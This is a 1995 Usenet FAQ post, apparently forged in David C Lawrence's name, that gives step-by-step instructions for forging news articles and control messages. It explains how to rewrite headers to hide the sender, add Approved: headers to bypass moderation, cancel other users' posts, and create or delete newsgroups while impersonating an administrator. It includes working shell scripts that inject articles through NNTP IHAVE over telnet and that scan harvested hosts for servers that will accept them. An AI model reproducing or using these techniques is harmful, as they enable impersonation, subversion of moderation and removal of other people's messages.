How to Fake Posts and Control Messages to Usenet

From: Anonymous (Pretending to be: tale@uunet.uu.net (David C Lawrence)
Subject: FAQ: Better living through forgery
Date: 19 Mar 1995 02:37:09 GMT

Anonymous netnews without “anonymous” remailers

Inspired by the recent “NetNews Judges-L” events, this file has been updated to cover forging control messages, so you can do your own article canceling and create and destroy your own newsgroups.

Save any news article to a file. We’ll call it “fakepost” in this example.

Edit “fakepost”, and remove any header lines of the form:

From some!random!path!user (note: “From “, not “From: “!!!)
Article:
Lines:
Xref:

Shorten the Path header down to its LAST two or three “bangized” components. This is to make the article look like it was posted from where it really was posted, and originally hit the net at or near the host you send it to. Or you can construct a completely new Path: line to reflect your assumed alias.

Make some change to the Message ID: field, that isn’t likely to be duplicated anywhere. This is usually best done by adding a couple of random characters to the part before the @, since news posting programs generally use a fixed-length field to generate these IDs.

Change the other headers to say what you like — From:, Newsgroups:, Sender:, etc. Replace the original message text with your message. If you are posting to a moderated group or posting a control message, remember to put in an Approved: header to bypass the moderation mechanism.

To specifically cancel someone else’s article, you need its message-ID.

Your message headers, in addition to what’s already there, should also contain the following with that message-ID in it. This makes it a ”control message”. NOTE: control messages generally require an Approved: header as well, so you should add one.

Subject: cmsg cancel <xb8700A@twits.site.com>
Control: cancel <xb8700A@twits.site.com>
Approved: luser@twits.site.com

Newsgroups are created and destroyed with control messages, too. If you wanted to create, for instance, comp.misc.microsoft.blows, your control headers would look like

Subject: cmsg newgroup comp.misc.microsoft.blows
Control: newgroup comp.misc.microsoft.blows

Add on the string “moderated” at the end of these if you want the group to be “moderated with no moderator” as with alt.hackers. Somewhere in the body of your message, you should include the following text, changed with the description of the group you’re creating:

For your newsgroups file:

comp.misc.microsoft.blows
We don’t do windows

To remove a group, substitute “rmgroup” for “newgroup” in the header lines above. Keep in mind that most sites run all “rmgroup” requests through a human news-master, who may or may not decide to honor it.

Group creation is more likely to be automatic than deletion at most installations. Any newsgroup changes are more likely to take effect if the come from me, since my name is hardwired into many of the NNTP control scripts, so using the From: and Approved: headers from this posting is recommended.

Save your changed article, check it to make sure it contains NO reference to yourself or your own site, and send it to your favorite NNTP server that permits transfers via the IHAVE command, using the following script:

#! /bin/sh
## Post an article via IHAVE.
## args filename server
 if test "$2" = "" ; then
 echo usage: $0 filename server
 exit 1
fi
if test ! -f $1 ; then
 echo $1: not found
 exit 1
fi
# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' |
 sed 's/.*-[Ii][Dd]: //'`
echo $msgid
( sleep 5
 echo IHAVE $msgid
 sleep 5
 cat $1
 sleep 1
 echo "."
 sleep 1
 echo QUIT ) | telnet $2 119

If your article doesn’t appear in a day or two, try a different server. They are easy to find. Here’s a script that will break a large file full of saved netnews into a list of hosts to try. Edit the output of
this if you want, to remove obvious peoples’ names and other trash.

#! /bin/sh
FGV='fgrep -i -v'
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp

Once you have your host list, feed it to the following script.

 #! /bin/sh
 while read xx ; do
 if test "$xx" = "" ; then continue;
 fi
 echo === $xx
 ( echo open $xx 119
 sleep 5
 echo ihave IamSOk00l@podunk.edu
 sleep 4
 echo .
 echo quit
 sleep 1
 echo quit
 ) | telnet
 done

If the above script is called “findem” and you’re using csh, you should do:

	findem < list >& outfile

so that ALL output from telnet is captured. This takes a long time, but when it finishes, edit “outfile” and look for occurrences of “335″. These mark answers from servers that might be willing to accept an article. This isn’t a completely reliable indication, since some servers respond with acceptance and later drop articles. Try a given server with a slightly modified repeat of someone else’s message, and see if it eventually appears.

Sometimes the telnets get into an odd state, and freeze, particularly when a host is refusing NNTP connections. If you manually kill these hung telnet processes but not the main script, the script will continue on. In other words, you may have to monitor the finding script a little while it is running.

You will notice other servers that don’t necessarily take an IHAVE, but say “posting ok”. You can probably do regular POSTS through these, but they will add an “NNTP-Posting-Host: ” header containing the machine YOU came from and are therefore unsuitable for completely anonymous
use.

Please use the information in this article for constructive purposes only.